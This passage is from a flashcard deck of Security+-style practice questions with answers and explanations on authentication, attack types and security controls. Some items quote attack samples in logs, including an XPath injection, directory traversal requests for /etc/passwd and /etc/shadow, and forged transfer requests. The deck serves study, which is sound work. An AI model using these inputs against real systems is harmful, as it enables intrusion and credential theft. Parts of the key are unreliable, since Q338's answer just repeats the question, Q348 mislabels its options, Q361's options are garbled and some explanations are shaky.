OAuth applications accessing corporate data may have caused data leakage due to unmodified default settings. This could mean that the OAuth applications were granted excessive permissions or were not properly configured to restrict access to only necessary data. Often, default settings in OAuth applications might allow broader access than intended if not adjusted during the setup or configuration phase. This oversight can lead to unintended data exposure and leakage, which seems to be the issue reported after the infrastructure update.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
333
Q

While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company’s servers. The program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized program, which of the following mitigations should the analyst implement to BEST secure the server environment?

a. Revoke the code signing certificate used by both programs.
b. Block all unapproved file hashes from installation
c. Add the accounting application file hash to the allowed list.
d. Update the code signing certificate for the approved application.

A

a. Revoke the code signing certificate used by both programs.

The unauthorized program utilizing the same code signing certificate as an approved application indicates a significant security risk. Code signing certificates are used to verify the authenticity and integrity of software. If an unauthorized program is using the same certificate, it could potentially impersonate the legitimate application, compromising the security and trustworthiness of the entire environment.

By revoking the compromised code signing certificate, the security analyst can prevent further misuse of the certificate by unauthorized programs. This action ensures that only legitimate software signed with valid certificates can be trusted and executed on company servers, thereby mitigating the risk of unauthorized software installations and potential security breaches.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
334
Q

A security analyst is reviewing the latest vulnerability scan report for a web server following an incident. The vulnerability report showed no concerning findings. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

a. Security patches failed to install due to a version incompatibility.
b. An adversary altered the vulnerability scan reports.
c. A zero-day vulnerability was used to exploit the web server.
d. The scan reported a false negative for the vulnerability.

A

d. The scan reported a false negative for the vulnerability.

In this scenario, the security analyst reviewed the latest vulnerability scan report, which showed no concerning findings. However, historical vulnerability scan reports indicate that the vulnerability used to exploit the server has been present before and that a patch is available for it. Despite this history, the current scan did not identify the vulnerability.

A false negative occurs in vulnerability scanning when the scan fails to detect an actual vulnerability that exists in the system. This could happen due to various reasons, such as misconfiguration of the scanning tool, incomplete scan coverage, insufficient scanning credentials, or even limitations in the scanning methodology itself. In this case, the vulnerability that led to the exploit was not identified in the latest scan, resulting in the false impression that the server was secure.

Therefore, the most likely cause in this situation is that the vulnerability scan reported a false negative for the vulnerability that was exploited.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
335
Q

The help desk has received calls from users in multiple locations who are unable to access core network services. The network team has identified and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT?

a. Disconnect all external network connections from the firewall.
b. Send response teams to the network switch locations to perform updates.
c. Turn on all the network switches by using the centralized management software.
d. Initiate the organization’s incident response plan.

A

d. Initiate the organization’s incident response plan.

The situation described involves multiple locations where users are unable to access core network services, prompting the network team to turn off the network switches remotely to address the issue. This action indicates a potential network-wide problem affecting multiple sites, which could be indicative of a broader incident.

Given the severity and scope of the issue, the next step should be to initiate the organization’s incident response plan (IRP). An incident response plan outlines the procedures and protocols to follow when responding to and mitigating security incidents or disruptions to normal operations. By following the IRP, the network team can systematically address the issue, coordinate responses across different locations, involve necessary stakeholders, and work towards restoring normal operations while ensuring the security and integrity of the network.

Therefore, option d, initiating the organization’s incident response plan, is the most appropriate next action in this scenario.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
336
Q

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker MOST likely attempting?

a. A spear-phishing attack
b. A watering-hole attack
c. Typo squatting
d. A phishing attack

A

b. A watering-hole attack

In a watering-hole attack, the attacker targets websites that are frequently visited by the intended victims. By compromising these websites with malware, the attacker aims to infect the visitors’ systems when they access these legitimate sites. This type of attack leverages the trust victims have in the targeted websites, making it easier to distribute malware and gain unauthorized access to their systems.

Therefore, given the scenario described where the attacker installs malware on a website visited by the target victims, the attack is most likely a watering-hole attack (option b).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
337
Q

An organization is moving away from the use of client-side and server-side certificates for EAP. The company would like for the new EAP solution to have the ability to detect rogue access points. Which of the following would accomplish these requirements?

a. PEAP
b. EAP-FAST
c. EAP-TLS
d. EAP-TTLS

A

b. EAP-FAST

EAP-FAST (Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling) is designed to provide a secure authentication method that does not rely on client-side or server-side certificates. Instead, it uses a Protected Access Credential (PAC) to establish a secure tunnel for authentication.

Additionally, EAP-FAST supports mechanisms for detecting rogue access points through the use of mutual authentication, where both the client and the server verify each other’s credentials and identities. This helps prevent unauthorized access points from intercepting communications or posing as legitimate network infrastructure.

a. PEAP (Protected Extensible Authentication Protocol): PEAP is an EAP type that encapsulates EAP methods within a TLS tunnel. It typically requires server-side certificates for TLS authentication, making it certificate-based. It does not inherently provide rogue access point detection.

c. EAP-TLS (Extensible Authentication Protocol-Transport Layer Security): EAP-TLS requires both client-side and server-side certificates for mutual authentication. It’s highly secure but relies on certificates, which the organization wants to move away from. It also does not include built-in mechanisms for detecting rogue access points.

d. EAP-TTLS (Extensible Authentication Protocol-Tunneled Transport Layer Security): EAP-TTLS is similar to PEAP in that it uses a TLS tunnel for secure authentication. It supports a variety of authentication methods within the tunnel but still requires server-side certificates for TLS authentication. It does not specifically provide rogue access point detection.

Among these options, EAP-FAST (option b) stands out because it provides a secure authentication method without the heavy reliance on certificates, using a PAC instead. It also includes mechanisms for detecting rogue access points, which aligns with the organization’s requirements. Therefore, EAP-FAST remains the best fit for the organization’s needs based on the information provided.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
338
Q

A security analyst receives a SIEM alert that someone logged in to the appadmin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:

[03/06/20xx:17:20:18] system 127.0.0.1 FindXPath=//User[Username/text()=’foo’ or 7=7 or ‘o’=’o’ AND Password/text=’bar’]
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:login result:success
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:open.account(12345) result:fail
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:open.account(23456) result:fail
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:open.account(34567) result:fail
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:open.account(45678) result:fail

Which of the following can the security analyst conclude?

a. A replay attack is being conducted against the application.
b. An injection attack is being conducted against a user authentication system.
c. A service account password may have been changed, resulting in continuous failed logins within the application.
d. A credentialed vulnerability scanner attack is testing several CVEs against the application.

A

A security analyst receives a SIEM alert that someone logged in to the appadmin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:

[03/06/20xx:17:20:18] system 127.0.0.1 FindXPath=//User[Username/text()=’foo’ or 7=7 or ‘o’=’o’ AND Password/text=’bar’]
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:login result:success
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:open.account(12345) result:fail
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:open.account(23456) result:fail
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:open.account(34567) result:fail
[03/06/20xx:17:21:18] appadmin 194.28.114.102 action:open.account(45678) result:fail

Which of the following can the security analyst conclude?

a. A replay attack is being conducted against the application.
b. An injection attack is being conducted against a user authentication system.
c. A service account password may have been changed, resulting in continuous failed logins within the application.
d. A credentialed vulnerability scanner attack is testing several CVEs against the application.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
339
Q

A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the following documents would the third-party vendor MOST likely be required to review and sign?

a. SLA
b. NDA
c. MOU
d. AUP

A

b. Non-Disclosure Agreement (NDA).

Here’s why:

NDA (Non-Disclosure Agreement): This document ensures that the third-party vendor agrees to keep confidential any sensitive information they access or learn about during the penetration testing process. It prevents them from disclosing or using this information for any purpose other than what is agreed upon in the testing scope.

SLA (Service Level Agreement): This document typically outlines the level of service the vendor will provide, including uptime guarantees and performance metrics. It is more relevant in contractual agreements for ongoing services rather than a one-time penetration test.

MOU (Memorandum of Understanding): This document establishes a mutual understanding between parties regarding their roles, responsibilities, and expectations. It may be used in various contexts, but it does not specifically address confidentiality concerns as directly as an NDA.

AUP (Acceptable Use Policy): This outlines acceptable use of the organization’s IT resources by employees or third parties. It is not directly related to the specific activities and confidentiality requirements of a penetration test.

Therefore, to protect the proprietary information of the application and ensure confidentiality during the penetration testing process, the third-party vendor would typically be required to review and sign an NDA (Non-Disclosure Agreement).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
340
Q

Which of the following is an administrative control that would be MOST effective to reduce the occurrence of malware execution?

a. Security awareness training
b. Frequency of NIDS updates
c. Change control procedures
d. EDR reporting cycle

A

a. Security awareness training

Here’s why:

Security awareness training educates employees about safe computing practices, such as recognizing phishing emails, avoiding suspicious websites, and understanding the risks associated with downloading files or clicking on unknown links. By improving employee awareness of cybersecurity threats, organizations can significantly reduce the likelihood of malware being executed through human error or lack of awareness.

Frequency of NIDS (Network Intrusion Detection System) updates (option b) is important for detecting and preventing network-based attacks but does not directly address the human factor that often leads to malware execution.

Change control procedures (option c) are crucial for managing changes in the IT environment to prevent unintended consequences, but they focus more on system integrity and stability rather than directly reducing malware execution.

EDR (Endpoint Detection and Response) reporting cycle (option d) refers to the frequency at which endpoint security events are reported and managed, which is important for incident response but does not prevent the initial execution of malware.

Therefore, security awareness training is the administrative control that would best empower employees to recognize and mitigate the risks associated with malware execution, making it the most effective choice among the options provided.

341
Q

Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset link. Which of the following attacks is being used to target the company?

a. Phishing
b. Vishing
c. Smishing
d. Spam

A

c. smishing.

Smishing is a form of phishing attack that uses SMS (Short Message Service) or text messages to deceive individuals into divulging sensitive information or clicking on malicious links. In this scenario:

Phishing typically refers to similar attacks conducted via email.
Vishing involves voice communication, such as phone calls, often impersonating legitimate entities to gather information.
Spam refers to unsolicited bulk messages sent through various mediums, including email and SMS, but does not necessarily imply malicious intent.

Therefore, smishing (option c) is the specific type of attack being used in this situation, where text messages with a password reset link are sent to employees in an attempt to deceive them.

342
Q

During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site requests are reverting to HTTP. Which of the following BEST describes what is happening?

a. Birthday collision on the certificate key
b. DNS hijacking to reroute traffic
c. Brute force to the access point
d. A SSL/TLS downgrade

A

d. SSL/TLS downgrade attack

Explanation :

SSL/TLS downgrade attack: In this type of attack, a malicious actor intercepts communication between a client (in this case, the attendee's device) and a server (the resource provided at the convention). The attacker then manipulates the traffic to force the use of less secure communication protocols, such as downgrading HTTPS (secure) connections to HTTP (unencrypted). This allows the attacker to potentially eavesdrop on or modify the data being transmitted.

Here’s why the other options are not correct:

Birthday collision on the certificate key (option a): This is a theoretical issue related to cryptographic keys, not directly related to the symptoms described.

DNS hijacking to reroute traffic (option b): While DNS hijacking can redirect traffic, it does not typically cause HTTPS to revert to HTTP. It might redirect users to malicious sites or intercept their traffic but doesn't directly cause protocol downgrades.

Brute force to the access point (option c): Brute forcing an access point typically refers to attempting to crack the Wi-Fi password or authentication credentials. While this could lead to unauthorized access, it doesn't cause HTTPS to HTTP downgrade.

Therefore, based on the symptoms described—delays in connection and HTTPS reverting to HTTP—the most likely scenario is a SSL/TLS downgrade attack where the attacker manipulates the traffic to undermine its security.

343
Q

A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or attributes are being utilized in the authentication process? (Choose two.)

a. Something you know
b. Something you have
c. Somewhere you are
d. Someone you know
e. Something you are
f. Something you can do

A

a. Something you know: This refers to the password that the user enters initially.
b. Something you have: This refers to the authentication code, which is typically generated by a token, app, or sent to a device that the user possesses.

344
Q

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following MOST likely occurred?

a. Fileless malware
b. A downgrade attack
c. A supply-chain attack
d. A logic bomb
e. Misconfigured BIOS

A

c. A supply-chain attack

Here’s why:

The company follows strict security measures, including hardening systems upon delivery, indicating a strong focus on initial security setup.
Despite these measures, an incident occurred due to tampering or replacement of the SoC (System on Chip).
Tampering or replacing the SoC typically involves unauthorized modification or substitution of hardware components.
Supply-chain attacks involve compromising hardware or software during the manufacturing or distribution process, which can lead to security breaches after the product is deployed.

Therefore, given the description, a supply-chain attack aligns most closely with the situation where tampering or replacement of the SoC has compromised the security of the company’s systems.

345
Q

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation for a few days. Which of the following attacks can the account lockout be attributed to?

a. Backdoor
b. Brute-force
c. Rootkit
d. Trojan

A

b. Brute-force attack

Here’s why:

Multiple failed login attempts: Audit logs show that the administrative account has been locked out multiple times during the day. This suggests that someone or something is attempting to log in repeatedly with incorrect credentials.
Engineer on vacation: Since the security engineer has been on vacation and is not actively using their account, legitimate login attempts from the engineer can be ruled out.
Brute-force attack: This type of attack involves an automated process that attempts many combinations of usernames and passwords in order to gain unauthorized access to an account. The repeated failed login attempts trigger the account lockout mechanism as a security measure.

Therefore, given the situation where the account lockout occurs while the account owner is away and there are multiple failed attempts, the most plausible cause is a brute-force attack targeting the administrative account.

346
Q

A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:

GET http://yourbank.com/transfer.do?acctnum=087646958&amount=500000 HTTP/1.1
GET http://yourbank.com/transfer.do?acctnum=087646958&amount=5000000 HTTP/1.1
GET http://yourbank.com/transfer.do?acctnum=087646958&amount=1000000 HTTP/1.1
GET http://yourbank.com/transfer.do?acctnum=087646958&amount=500 HTTP/1.1

Which of the following types of attacks is MOST likely being conducted?

a. SQLi
b. CSRF
c. Spear phishing
d. API

A

b. CSRF (Cross-Site Request Forgery)

Here’s the reasoning:

Pattern of requests: The requests are structured as HTTP GET requests to transfer funds (transfer.do) with different amounts specified in the amount parameter.
Consistent target account: The acctnum parameter (087646958) remains the same across all requests.
HTTP GET method: CSRF attacks typically use GET requests to initiate actions on behalf of the user without their explicit consent, often using their authenticated session.

In CSRF attacks, an attacker tricks a logged-in user into unknowingly executing actions on a web application by leveraging the user’s authenticated session. The requests observed in the log appear to be attempting to transfer various amounts of money from a specific account (087646958) without the user’s knowledge or consent.

Therefore, based on the nature of the requests and the target account, CSRF is the most likely type of attack being conducted in this scenario.

347
Q

After installing a patch on a security appliance, an organization realized a massive data exfiltration had occurred. Which of the following BEST describes the incident?

a. Supply chain attack
b. Ransomware attack
c. Cryptographic attack
d. Password attack

A

a. Supply chain attack

Here’s the reasoning:

Patch installation: After installing a patch on a security appliance, which typically involves updating software or firmware, the organization experienced unexpected consequences.
Massive data exfiltration: This suggests that the patch installation might have introduced a vulnerability or backdoor into the system, which was exploited by an attacker.
Supply chain attack: In a supply chain attack, malicious actors exploit vulnerabilities or weaknesses in a third-party supplier or service provider to compromise the target organization's systems. Installing a compromised patch from a supplier or vendor can lead to unintended consequences such as unauthorized access or data exfiltration.

Given the context of the incident—installation of a patch leading to data exfiltration—the scenario aligns closely with characteristics of a supply chain attack, where the security of the organization’s systems was compromised through a third-party software or component. Therefore, supply chain attack is the most appropriate description of the incident.

348
Q

A security analyst reviews web server logs and notices the following lines:

104.35.45.53 - - [22/May/2020:06:57:31 +0100] “GET /show_file.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1” 200 11705 “https://www.example.com/downloaderport.php”
104.35.45.53 - - [22/May/2020:07:00:58 +0100] “GET /show_file.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1” 200 23713 “https://www.example.com/downloaderport.php”

Which of the following vulnerabilities has the attacker exploited? (Choose two.)

a. Race condition
b. LFI
c. Pass the hash
d. XSS
e. RFI
f. Directory traversal

A

a. LFI (Local File Inclusion) , b. Directory traversal

a. LFI (Local File Inclusion) - The requests GET /show_file.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd indicate attempts to include files from directories above the web root (../../etc/passwd). This is a classic example of a directory traversal attack, specifically targeting local files.

b. Directory traversal - This is closely related to LFI but specifically refers to attempts to access files and directories that are outside the intended directory structure. The presence of %2e%2e%2f%2e%2e%2fetc%2fpasswd in the URL parameters (file) confirms that the attacker is trying to navigate up the directory structure to access sensitive files.

Therefore, the correct answers are LFI and Directory traversal. These vulnerabilities involve manipulating file path references to access unauthorized files on the server.

c. Pass the hash - This attack involves stealing hashed credentials and using them to authenticate without needing to decrypt the hashes. The logs do not show evidence of credential hashing or authentication attempts.

d. XSS (Cross-Site Scripting) - XSS involves injecting malicious scripts into web pages viewed by other users. The logs provided do not show any evidence of script injection or manipulation of client-side scripts.

e. RFI (Remote File Inclusion) - RFI involves including remote files hosted on another server. The logs provided do not indicate requests to include files from a remote server.

f. Race condition - A race condition occurs when two or more operations must be executed in the correct sequence, but the logs do not suggest any timing or sequencing issues.

Based on the web server logs provided, the attacker exploited vulnerabilities related to LFI (Local File Inclusion) and Directory traversal by attempting to access sensitive files on the server using crafted file path parameters.

349
Q

An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the following is the MOST likely reason for this type of assessment?

a. An international expansion project is currently underway.
b. Outside consultants utilize this tool to measure security maturity.
c. The organization is expecting to process credit card information.
d. A government regulator has requested this audit to be completed.

A

c. The organization is expecting to process credit card information.

PCI DSS compliance is required for any organization that handles credit card information, regardless of size or number of transactions. It ensures that companies securely process, store, and transmit credit card information to prevent data breaches and theft. Completing a PCI DSS self-assessment helps organizations evaluate their adherence to these standards before they start processing credit card payments.

350
Q

Physical access to the organization’s servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor, a door to the server floor itself, and eventually to a caged area solely for the organization’s hardware. Which of the following controls is described in this scenario?

a. Compensating
b. Deterrent
c. Preventive
d. Detective

A

In the scenario described, the multiple layers of access points and controls are primarily aimed at preventing unauthorized physical access to the organization’s servers in the data center. Each access point, from the lobby to the caged area, adds a layer of security that must be passed through to reach the servers. This setup aligns with preventive controls.

Therefore, the correct answer is:

c. Preventive

Preventive controls are designed to deter incidents from occurring by implementing barriers and safeguards to prevent unauthorized access, such as physical barriers, access control systems, and authentication mechanisms. These controls aim to reduce the likelihood of unauthorized access by making it difficult for unauthorized individuals to physically reach sensitive areas or assets.

351
Q

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs. Which of the following is the MOST likely cause of this issue?

a. TFTP was disabled on the local hosts.
b. SSH was turned off instead of modifying the configuration file.
c. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
d. Network services are no longer running on the NAS.

A

b. SSH was turned off instead of modifying the configuration file.

Here’s the reasoning:

Disabling remote logins to the NAS typically involves configuring SSH (Secure Shell) settings. SCP (Secure Copy Protocol) relies on SSH for secure file transfers. If SSH was turned off instead of properly modifying the SSH configuration file to disable remote logins while still allowing SCP transfers, users would be unable to use SCP to transfer files to the NAS.

Therefore, disabling SSH without correctly configuring the SSH configuration file to allow SCP could lead to the reported issue where users cannot use SCP for file transfers, even though they can still view data from their PCs. This aligns with the scenario described where remote logins were disabled but SCP functionality was inadvertently affected.

352
Q

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

a. Bug bounty
b. Black-box
c. Gray-box
d. White-box

A

c. Gray-box testing.

Here’s why:

Black-box testing typically involves testing without any prior knowledge of the internal workings of the application or network. The tester starts with no information about the internal structure, code, or architecture.

White-box testing involves testing where the tester has full knowledge of the internal workings, including access to source code, architecture diagrams, and documentation.

Gray-box testing falls between black-box and white-box testing. In gray-box testing, the tester has partial knowledge of the internal workings of the application or network. In this scenario, the security firm has been provided with documentation available to customers of the applications. This partial knowledge allows the testers to conduct a more targeted and effective assessment, leveraging the information they have about the application's functionality, interfaces, and potentially some internal workings, while still simulating the perspective of an external attacker to some extent.

Therefore, the BEST representation of the type of testing that will occur in this scenario is Gray-box testing.

353
Q

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

a. Disable Telnet and force SSH.
b. Establish a continuous ping.
c. Utilize an agentless monitor.
d. Enable SNMPv3 with passwords.

A

c. Utilize an agentless monitor.

Here’s why this is the best choice:

Agentless monitoring involves using monitoring tools that do not require the installation of agents or software on the monitored devices. This approach is generally preferred because it reduces the overhead associated with deploying and maintaining agents across numerous devices.

Agentless monitoring can gather information through protocols like SNMP (Simple Network Management Protocol), WMI (Windows Management Instrumentation), SSH (Secure Shell), and others, depending on the type of devices being monitored. It can provide comprehensive visibility into network performance, availability, and security posture without the need for agents.

Let’s briefly discuss why the other options are not as optimal:

a. Disable Telnet and force SSH: This is a security recommendation rather than a method for monitoring network operations. While it enhances security by using SSH instead of Telnet for remote access, it doesn't directly relate to network monitoring.

b. Establish a continuous ping: Continuous pinging can be useful for basic network connectivity testing, but it's not comprehensive enough for monitoring network operations in terms of performance, security, and other critical metrics.

d. Enable SNMPv3 with passwords: SNMPv3 is a secure version of SNMP that provides authentication and encryption. While SNMP can be useful for monitoring network devices, it requires careful configuration of authentication and encryption parameters to ensure security. However, it still involves deploying agents (SNMP agents) on the network devices, which is not agentless.
354
Q

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities. Which of the following would BEST meet this need?

a. CVE
b. SIEM
c. SOAR
d. CVSS

A

d. CVSS (Common Vulnerability Scoring System)

Here’s why CVSS is the best choice:

CVSS (Common Vulnerability Scoring System) is a standardized system for assessing and communicating the severity of vulnerabilities. It assigns a score to vulnerabilities based on metrics such as exploitability, impact, and complexity, providing a numerical representation of the severity level.

CVSS scores range from 0 to 10, with higher scores indicating more severe vulnerabilities. This numerical scale helps leadership teams quickly understand the relative severity of vulnerabilities across the organization's systems and infrastructure.

CVE (Common Vulnerabilities and Exposures) is a dictionary of publicly known information security vulnerabilities and exposures but does not provide severity scoring directly. It lists vulnerabilities but does not quantify their severity in a standardized way.

SIEM (Security Information and Event Management) and SOAR (Security Orchestration, Automation, and Response) are tools and platforms used for monitoring, managing security events, and automating responses. While they are valuable for operational security, they do not directly provide a standardized severity scoring for vulnerabilities.

Therefore, CVSS is specifically designed to meet the need of communicating severity levels of vulnerabilities effectively to the leadership team, making it the most appropriate choice in this scenario.

355
Q

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

a. CYOD
b. MDM
c. COPE
d. VDI

A

d. VDI (Virtual Desktop Infrastructure)

Here’s why VDI is the most appropriate choice:

VDI (Virtual Desktop Infrastructure) allows employees to access a desktop environment hosted on a centralized server or cloud platform. This environment is managed by the company and provides a consistent desktop experience regardless of the device used by the employee.

In the scenario described, employees are using their personal computers (BYOD - Bring Your Own Device) to access the company's cloud computing environment. With VDI, the company manages the operating system and desktop environment centrally, ensuring security and control over corporate data and applications.

CYOD (Choose Your Own Device) typically involves employees selecting a device from a set of approved options provided by the company. This model does not align with employees using their personal computers.

MDM (Mobile Device Management) and COPE (Corporate-Owned, Personally-Enabled) are more focused on managing mobile devices (MDM) or company-provided devices (COPE), rather than personal computers accessing cloud resources.

Therefore, VDI is the deployment model implemented by the company in this scenario, allowing employees to securely access a managed desktop environment from their personal devices while keeping company data and applications centralized and controlled.

356
Q

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?

a. IDS solution
b. EDR solution
c. HIPS software solution
d. Network DLP solution

A

d. Network DLP (Data Loss Prevention) solution

Here’s why Network DLP is the most suitable choice:

Network DLP solutions are specifically designed to monitor and inspect data transmitted over the network in real-time. They can detect sensitive information based on predefined rules and policies, including PII and credit card numbers.

These solutions can analyze network traffic, including email, web traffic, file transfers, and other communications channels, to identify and prevent the unauthorized transmission of sensitive data.

IDS (Intrusion Detection System), EDR (Endpoint Detection and Response), and HIPS (Host-based Intrusion Prevention System) are important security tools but are typically focused on different aspects of security monitoring and threat detection, such as endpoint behavior, network intrusion attempts, or host-based security.

For the specific requirement of inspecting in-transit files for sensitive data across the enterprise network, a Network DLP solution is designed to provide the necessary visibility and control.

Therefore, Network DLP solution is the best option for the security administrator to use in order to inspect in-transit files and detect sensitive data like PII and credit card information on the enterprise network.

357
Q

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

a. SSO
b. MFA
c. PKI
d. DLP

A

a. SSO (Single Sign-On)

Here’s an explanation:

SAML (Security Assertion Markup Language) is a protocol used for exchanging authentication and authorization data between parties, particularly between an identity provider (IdP) and a service provider (SP). It allows for the creation and management of federated identities.

Single Sign-On (SSO) is a user authentication process that permits a user to enter one set of credentials (such as a username and password) to access multiple applications and services. SSO relies heavily on SAML to enable this seamless authentication across different systems and organizations.

MFA (Multi-Factor Authentication) is a security system that requires more than one method of authentication from independent categories of credentials to verify the user's identity. While SAML can support MFA, federating identities specifically enables SSO.

PKI (Public Key Infrastructure) is a framework for creating a secure method for exchanging information based on public key cryptography. It is not directly related to federating identities with SAML.

DLP (Data Loss Prevention) refers to strategies and tools used to prevent sensitive data from being lost, misused, or accessed by unauthorized users. It is not directly related to federating identities with SAML.

Therefore, federating user digital identities using SAML-based protocols primarily enables Single Sign-On (SSO).

358
Q

An employee’s company account was used in a data breach. Interviews with the employee revealed:

*The employee was able to avoid changing passwords by using a previous password again.
*The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

a. Geographic dispersal
b. Password complexity
c. Password history
d. Geotagging
e. Password lockout
f. Geofencing

A

c. Password history

Explanation: Enforcing password history ensures that users cannot reuse previous passwords, thereby enhancing password security.

f. Geofencing

Explanation: Geofencing restricts access based on geographic locations, preventing logins from unauthorized or unexpected regions, such as hostile foreign nations where the employee has never traveled.

These measures will address the problems of password reuse and unauthorized access from foreign locations.

359
Q

A large industrial system’s smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company’s security manager notices the generator’s IP is sending packets to an internal file server’s IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

a. Segmentation
b. Firewall allow list
c. Containment
d. Isolation

A

(Community A : 81%, B : 19%)
a. Segmentation

Explanation: Network segmentation involves dividing the network into smaller, isolated segments to limit access and control traffic between different parts of the network. By segmenting the network, the security manager can ensure that the smart generator can still send alerts to third-party maintenance personnel while preventing it from communicating with internal file servers, thereby maintaining alerting capabilities and enhancing security.

360
Q

Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?

a. File integrity monitoring
b. Honeynets
c. Tcpreplay
d. Data loss prevention

A

d. Data loss prevention

Explanation: Data loss prevention (DLP) technologies are designed to monitor, detect, and block the transmission of specific types of sensitive information across a network. DLP can be configured to look for and take action on particular file types being transmitted, ensuring that sensitive data does not leave the network without proper authorization.

361
Q

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

a. HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
b. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
c. HTTPS://
.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
d. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

A

c. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

Explanation: This certificate meets the requirement of rotating annually and contains a wildcard only at the secondary subdomain level (*.app1.comptia.org). The other options either do not have the correct wildcard level or do not adhere to the annual rotation requirement.

362
Q

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be BEST to help the organization’s executives determine their next course of action?

a. An incident response plan
b. A communication plan
c. A disaster recovery plan
d. A business continuity plan

A

d. A business continuity plan

Explanation: A business continuity plan (BCP) is designed to help organizations continue operating during and after a disruption, such as a global pandemic. It provides strategies for maintaining essential functions, managing reduced staffing, and making informed decisions on business operations. An incident response plan, communication plan, and disaster recovery plan are important but are more specific in scope and do not comprehensively address the wide-ranging impacts of a pandemic on business operations.

363
Q

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst MOST likely seeing?

a. http://sample.url.com/
b. http://sample.url.com/someotherpageonsite/../../../etc/shadow
c. http://sample.url.com/select-from-database-where-password-null
d. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect

A

b. http://sample.url.com/someotherpageonsite/../../../etc/shadow

Explanation: A directory traversal attack occurs when an attacker uses sequences like ../ to move up the directory hierarchy and access files outside of the web server’s root directory. The URL http://sample.url.com/someotherpageonsite/../../../etc/shadow shows such a pattern, indicating an attempt to access the sensitive /etc/shadow file, which typically contains hashed passwords for users on Unix-based systems. This is a classic example of a directory traversal attack.

364
Q

A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following BEST describes this type of attack?

a. Reconnaissance
b. Impersonation
c. Typosquatting
d. Watering-hole

A

c. Typosquatting

Explanation: Typosquatting is a type of cyber attack where an attacker registers domain names that are similar to legitimate ones, often exploiting common typing errors. In this case, the attacker registered http://comptiia.org, which closely resembles http://comptia.org, to deceive users into thinking they are visiting the legitimate site.

365
Q

The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

a. NAC
b. ACL
c. WAF
d. NAT

A

b. ACL

